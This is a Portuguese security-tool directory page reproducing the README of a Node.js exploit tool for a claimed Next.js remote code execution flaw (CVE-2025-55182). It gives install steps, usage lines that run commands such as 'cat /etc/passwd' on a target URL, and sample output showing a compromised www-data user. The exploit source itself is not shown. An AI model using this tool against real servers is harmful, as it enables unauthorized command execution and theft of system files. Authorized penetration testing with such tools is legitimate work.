Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2025-55182-node — CVE-2025-55182 Next.js RCE Exploit Tool | Kitploit
Ferramentas/GitHubGitHub/racall/cve-2025-55182-node
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubracall/cve-2025-55182-node

cve-2025-55182-node

CVE-2025-55182 Next.js RCE Exploit Tool

Ver Repositório
1há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182 Ferramenta de Exploração RCE no Next.js

Documentação em Chinês | Análise do Princípio da Vulnerabilidade


[!CAUTION]

⚠️ AVISO - LEIA ANTES DE USAR

Esta ferramenta é destinada APENAS para:

  • Pesquisadores de segurança realizando verificação de vulnerabilidades
  • Testes de penetração autorizados com permissão explícita
  • Propósitos educacionais e de aprendizado

Acesso não autorizado a sistemas de computador é ILEGAL.

Ao usar esta ferramenta, você concorda que:

  1. Você obteve a devida autorização antes de testar qualquer sistema
  2. Você não usará esta ferramenta para fins maliciosos
  3. Você é o único responsável por suas ações e quaisquer consequências

O autor não assume NENHUMA responsabilidade pelo uso indevido desta ferramenta.


Uma ferramenta de exploração de execução remota de código (RCE) para a vulnerabilidade de poluição de protótipo do lado do servidor no Next.js.

Visão Geral da Vulnerabilidade

CVE-2025-55182 é uma vulnerabilidade crítica de segurança que afeta o Next.js, permitindo que atacantes obtenham execução remota de código através de requisições maliciosas que exploram a poluição de protótipo.

📖 Para análise técnica detalhada, veja EXPLOIT.md

Versões Afetadas

  • Versões específicas do Next.js (consulte o aviso de segurança oficial)

Como Funciona

Esta vulnerabilidade explora o mecanismo de manipulação de requisições de Server Actions do Next.js, alcançando execução arbitrária de código através da poluição da cadeia de protótipos __proto__ combinada com o construtor Function.

Instalação

root@kitploit:~
# Using yarn
yarn install

# Using npm
npm install

Uso

Execução Direta

root@kitploit:~
# Basic usage
node index.js <target_url> [command]

# Examples
node index.js http://localhost:3000
node index.js http://localhost:3000 "ls -la"
node index.js http://localhost:3000 "cat /etc/passwd"

Usando scripts yarn

root@kitploit:~
# Run the tool
yarn start http://localhost:3000 "whoami"

# Or use alias
yarn exploit http://localhost:3000 "ls -la"

# Show help
yarn help

Instalação Global via CLI

root@kitploit:~
# Link globally
yarn link
# or
npm link

# Then use the command directly
cve-2025-55182 http://localhost:3000
cve-2025-55182 http://localhost:3000 "whoami"

# Unlink
yarn unlink

Opções da CLI

root@kitploit:~
Usage:
  cve-2025-55182 <url> [command]

Arguments:
  url       Target URL (required)
  command   Command to execute (default: whoami)

Options:
  -h, --help     Show help message
  -v, --version  Show version number

Formato de Saída

A ferramenta exibe os resultados no formato JSON:

Execução Bem-sucedida

root@kitploit:~
{
  "success": true,
  "message": "",
  "data": "command execution result"
}

Execução Falha

root@kitploit:~
{
  "success": false,
  "message": "error message",
  "data": null
}

Exemplo

root@kitploit:~
$ cve-2025-55182 http://vulnerable-site.com "id"
{
  "success": true,
  "message": "",
  "data": "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data)"
}

Dependências

  • axios - Cliente HTTP
  • form-data - Construtor de FormData

Referências

  • Consulte os scripts Python
Baixar ferramenta